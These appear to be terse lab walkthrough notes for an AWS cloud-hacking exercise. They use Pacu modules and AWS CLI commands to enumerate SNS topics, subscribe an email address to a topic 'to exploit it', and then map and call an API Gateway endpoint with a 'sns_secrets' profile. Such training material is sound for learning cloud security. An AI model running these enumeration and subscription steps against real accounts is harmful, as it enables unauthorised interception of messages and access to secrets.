Hack. Eat. Sleep. Repeat!!!
Amazon Simple Notification Service (Amazon SNS) is a managed service that provides message delivery from publishers to subscribers (also known as producers and consumers). Publishers communicate asynchronously with subscribers by sending messages to a topic, which is a logical access point and communication channel.
run sns__enum --region us-east-1
data to check the dataaws sns get-topic-attributes --topic-arn --profile sns_secrets| jq
sns_subscribe to exploit it.run sns__subscribe --topics <arn:number> --email <email>
aws apigateway get-rest-apis --profile sns-secrets --region us-east-1
aws apigateway get-rest-apis --profile sns_secrets --region us-east-1 --query "items[*].id" | jq
Stage name and Resource Path.aws apigateway get-stages --rest-api-id [API ID] --profile sns-secrets --region us-east-1
aws apigateway get-resources --rest-api-id [API ID] --profile sns-secrets --region us-east-1
curlhttps://[api id].execute-api.us-east-1.amazonaws.com/[stage name]/[path]